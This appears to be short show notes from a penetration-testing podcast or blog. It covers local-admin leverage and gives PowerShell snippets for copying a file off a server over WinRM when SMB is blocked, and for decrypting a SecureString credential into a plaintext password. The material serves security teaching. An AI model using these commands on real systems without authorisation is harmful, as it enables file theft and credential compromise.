In today's tale of pentest pwnage we talk about:
-
The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure
-
Copying files via WinRM when copying over SMB is blocked:
$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential * ...then provide your creds...and then:
copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sess - If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))